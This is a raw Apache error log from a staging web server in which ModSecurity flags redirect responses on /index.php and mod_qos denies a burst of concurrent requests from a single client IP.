[Tue May 26 19:59:15.339908 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251oQAAAgk"]
[Tue May 26 19:59:15.342823 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252DQAAAec"]
[Tue May 26 19:59:15.364655 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252DgAAAdA"]
[Tue May 26 19:59:15.365360 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251pwAAAbM"]
[Tue May 26 19:59:15.366504 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOkqK9k_ZUB2Vp252AQAAAaY"]
[Tue May 26 19:59:15.387955 2026] [security2:error] [pid 93868:tid 94301] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252FQAAAbo"]
[Tue May 26 19:59:15.391701 2026] [security2:error] [pid 93868:tid 94279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252JAAAAaQ"]
[Tue May 26 19:59:15.394863 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251sgAAAgw"]
[Tue May 26 19:59:15.396136 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252IwAAAas"]
[Tue May 26 19:59:15.398163 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251qAAAAcM"]
[Tue May 26 19:59:15.398453 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuOUqK9k_ZUB2Vp251swAAAf0"]
[Tue May 26 19:59:15.402373 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252DwAAAco"]
[Tue May 26 19:59:15.423633 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252LQAAAgY"]
[Tue May 26 19:59:15.428863 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252LAAAAZ0"]
[Tue May 26 19:59:15.430208 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252JQAAAeo"]
[Tue May 26 19:59:15.434340 2026] [security2:error] [pid 93868:tid 94287] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252IgAAAaw"]
[Tue May 26 19:59:15.441717 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252MAAAAbs"]
[Tue May 26 19:59:15.442012 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252NgAAAfc"]
[Tue May 26 19:59:15.455690 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszrmgAAAAE"]
[Tue May 26 19:59:15.564117 2026] [qos:error] [pid 93868:tid 94343] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuO0qK9k_ZUB2Vp252ggAAAeQ
[Tue May 26 19:59:15.564280 2026] [qos:error] [pid 93868:tid 94327] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuO0qK9k_ZUB2Vp252gwAAAdQ
[Tue May 26 19:59:15.580050 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252hgAAAgg
[Tue May 26 19:59:15.582001 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252hwAAAaA
[Tue May 26 19:59:15.589618 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252iAAAAeI
[Tue May 26 19:59:15.606298 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsCwAAAGI
[Tue May 26 19:59:15.606979 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsDAAAAFI
[Tue May 26 19:59:15.607439 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsDQAAAHA
[Tue May 26 19:59:15.608336 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsDgAAAFU
[Tue May 26 19:59:15.824053 2026] [qos:error] [pid 93576:tid 93763] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsEAAAADM
[Tue May 26 19:59:15.826519 2026] [qos:error] [pid 93868:tid 94344] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252kQAAAeU
[Tue May 26 19:59:15.829724 2026] [qos:error] [pid 93868:tid 94338] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252kgAAAd8
[Tue May 26 19:59:15.832023 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsEQAAAFY
[Tue May 26 19:59:15.833604 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsEgAAAC0
[Tue May 26 19:59:15.835327 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsEwAAAHU
[Tue May 26 19:59:15.840392 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsFAAAAAo
[Tue May 26 19:59:15.840794 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252kwAAAfs
[Tue May 26 19:59:15.842731 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252lAAAAgQ
[Tue May 26 19:59:15.843570 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsFQAAAHg
[Tue May 26 19:59:15.974942 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsFgAAABg
[Tue May 26 19:59:15.978652 2026] [qos:error] [pid 93868:tid 94364] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252mAAAAfk
[Tue May 26 19:59:15.979920 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsFwAAAEg
[Tue May 26 19:59:15.981159 2026] [qos:error] [pid 93868:tid 94278] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252mQAAAaM
[Tue May 26 19:59:15.981786 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsGAAAAB4
[Tue May 26 19:59:15.985613 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsGQAAAGE
[Tue May 26 19:59:15.992509 2026] [qos:error] [pid 93868:tid 94319] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252mgAAAcw
[Tue May 26 19:59:15.994104 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsGgAAAAg
[Tue May 26 19:59:15.997290 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuO2DRMqfxdEDkoszsGwAAAAA
[Tue May 26 19:59:15.997294 2026] [qos:error] [pid 93868:tid 94350] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuO0qK9k_ZUB2Vp252mwAAAes
[Tue May 26 19:59:16.124852 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsHgAAACw
[Tue May 26 19:59:16.129747 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsIAAAACc
[Tue May 26 19:59:16.129943 2026] [qos:error] [pid 93868:tid 94338] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPEqK9k_ZUB2Vp252ogAAAd8
[Tue May 26 19:59:16.130871 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsIQAAAG0
[Tue May 26 19:59:16.132990 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPEqK9k_ZUB2Vp252owAAAfs
[Tue May 26 19:59:16.135656 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsIwAAAAU
[Tue May 26 19:59:16.144992 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPEqK9k_ZUB2Vp252pgAAAZs
[Tue May 26 19:59:16.147817 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsJAAAADA
[Tue May 26 19:59:16.151058 2026] [qos:error] [pid 93868:tid 94312] [client 45.148.10.120:35376] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPEqK9k_ZUB2Vp252pwAAAcU
[Tue May 26 19:59:16.151060 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsJQAAADs
[Tue May 26 19:59:16.278368 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsJwAAACI
[Tue May 26 19:59:16.279002 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuPGDRMqfxdEDkoszsKAAAAAw
[Tue May 26 19:59:16.279757 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252LgAAAa8"]
[Tue May 26 19:59:16.280310 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszrmQAAAG8"]
[Tue May 26 19:59:16.288566 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252JgAAAbw"]
[Tue May 26 19:59:16.292677 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252KgAAAZE"]
[Tue May 26 19:59:16.307200 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszrrgAAADY"]
[Tue May 26 19:59:16.308877 2026] [qos:error] [pid 93868:tid 94287] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPEqK9k_ZUB2Vp252tQAAAaw
[Tue May 26 19:59:16.310065 2026] [qos:error] [pid 93868:tid 94272] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuPEqK9k_ZUB2Vp252uQAAAZ0
[Tue May 26 19:59:16.318310 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszruQAAAGY"]
[Tue May 26 19:59:16.325479 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252OQAAAZQ"]
[Tue May 26 19:59:16.334037 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252IQAAAZg"]
[Tue May 26 19:59:16.338607 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszrswAAAEo"]
[Tue May 26 19:59:16.345223 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszrrwAAAAc"]
[Tue May 26 19:59:16.345856 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr2wAAABk"]
[Tue May 26 19:59:16.346904 2026] [security2:error] [pid 93868:tid 94378] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252LwAAAgc"]
[Tue May 26 19:59:16.350506 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr0gAAAAM"]
[Tue May 26 19:59:16.351215 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr3AAAAF4"]
[Tue May 26 19:59:16.359083 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252OgAAAg0"]
[Tue May 26 19:59:16.363718 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszrwAAAADc"]
[Tue May 26 19:59:16.367908 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252PgAAAa0"]
[Tue May 26 19:59:16.371540 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszruwAAADI"]
[Tue May 26 19:59:16.377936 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszrrAAAAE0"]
[Tue May 26 19:59:16.380894 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252UQAAAgY"]
[Tue May 26 19:59:16.381521 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252UAAAAb0"]
[Tue May 26 19:59:16.393157 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr6QAAABU"]
[Tue May 26 19:59:16.397857 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252VQAAAbY"]
[Tue May 26 19:59:16.399871 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO2DRMqfxdEDkoszr2AAAAAs"]
[Tue May 26 19:59:16.406665 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuO0qK9k_ZUB2Vp252WgAAAek"]
